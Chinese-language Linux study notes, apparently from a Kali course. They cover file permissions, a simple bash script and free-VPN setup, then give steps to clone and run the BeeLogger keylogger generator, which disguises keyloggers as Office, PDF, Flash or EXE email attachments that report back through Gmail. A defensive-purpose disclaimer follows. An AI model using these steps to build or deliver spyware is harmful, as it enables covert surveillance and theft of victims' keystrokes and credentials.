文件所有权和权限
touch --help
cd Desktop
mkdir Folder
cd Folder
clear
touch Test1 Test2 Test3 Test4
ls
ls -l
用户 用户组权限
chown sec875:kali Test1
chown root:root Test2
clear
ls -l
cd Downloads
cd ..
ls
cd lscript
ls
ls -l
clear
cd ..
cd Desktop
clear
mkdir Bash
cd Bash
clear
echo "Hello World"
echo "linux Rocks" > bash
ls
mv bash bash.sh
ls
ls -l
./bash.sh
chmod +x bash.sh
ls
./bash.sh
nano bash.sh
hello world
clear
cd ..
ls
rm Bash
rm --help
man rm
rm -r Bash
rm -r Folder
chmod 777
免费设置匿名
https://www.vpnbook.com/freevpn
sudo openvpn 复制粘贴文件名字25000
输入账号密码
duckduckgo.com 不会改变DNS信息 check for dns leaks
sudo openvpn 复制粘贴文件名字53
输入账号密码
Windows键盘记录器
脚本 https://github.com/4w4k3/BeeLogger
sudo bash
cd Desktop
git clone URL地址
ls
cd BeeLogger/
ls
./install.sh
选择 win7 python2.7
ls
python bee.py
关闭,打开一个新终端
sudo bash
cd Desktop
cd BeeLogger/
python bee.py
k flash word excel ppt pdf exe
需要Gmail账户,记录器发回信息
有必要说明一下,过分的展示细节是为了真正掌握好防御,正如此处一样。
我们知道,红方把键盘记录器生成为flash,word,excel,ppt,pdf,exe文件添加到邮件中,从而等你上钩。
你才会真的明白过程,使得自己从本质入手,采用最有效的规避手段阻止自己的财产损失。
请各位不要盲目的下定论:过分的细节展示,有助于犯罪。
不要过早的下定论说:你看他教的都是违法犯罪的东西。
请大家保持红蓝对抗的开发思维,促进安全行业的健康发展。
也请学习和交流者遵守网络安全法,保持底线,不要越界。学习需要,请使用自己的靶机,感谢大家。
正相反,犯罪者早就已经掌握了攻击技术。弱小的只是我们。细节部分相对于红队技术而言,对蓝队和用户的帮助更大。
清晰的认知整个技术细节,从特征特性上防御网络攻击。